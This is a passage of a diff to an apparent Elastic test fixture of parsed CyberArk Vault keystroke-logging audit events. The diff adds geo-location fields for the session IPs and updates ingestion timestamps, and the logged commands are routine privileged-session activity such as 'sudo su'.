Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:49\",\"IsoTimestamp\":\"2021-03-14T13:49:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -224,17 +242,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -315,7 +351,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165104900Z", + "ingested": "2021-12-14T14:42:28.146631683Z", "original": "\u003c5\u003e1 2021-03-15T10:32:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:32:04\",\"IsoTimestamp\":\"2021-03-15T10:32:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -338,17 +374,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -429,7 +483,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165109400Z", + "ingested": "2021-12-14T14:42:28.146632074Z", "original": "\u003c5\u003e1 2021-03-15T10:33:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:47\",\"IsoTimestamp\":\"2021-03-15T10:33:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -452,17 +506,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -543,7 +615,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165114900Z", + "ingested": "2021-12-14T14:42:28.146632485Z", "original": "\u003c5\u003e1 2021-03-15T10:35:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:08\",\"IsoTimestamp\":\"2021-03-15T10:35:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -566,17 +638,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -662,7 +752,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165120Z", + "ingested": "2021-12-14T14:42:28.146632882Z", "original": "\u003c5\u003e1 2021-03-15T14:11:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:18\",\"IsoTimestamp\":\"2021-03-15T14:11:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", @@ -685,17 +775,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -781,7 +889,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165124200Z", + "ingested": "2021-12-14T14:42:28.146633288Z", "original": "\u003c5\u003e1 2021-03-15T14:45:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 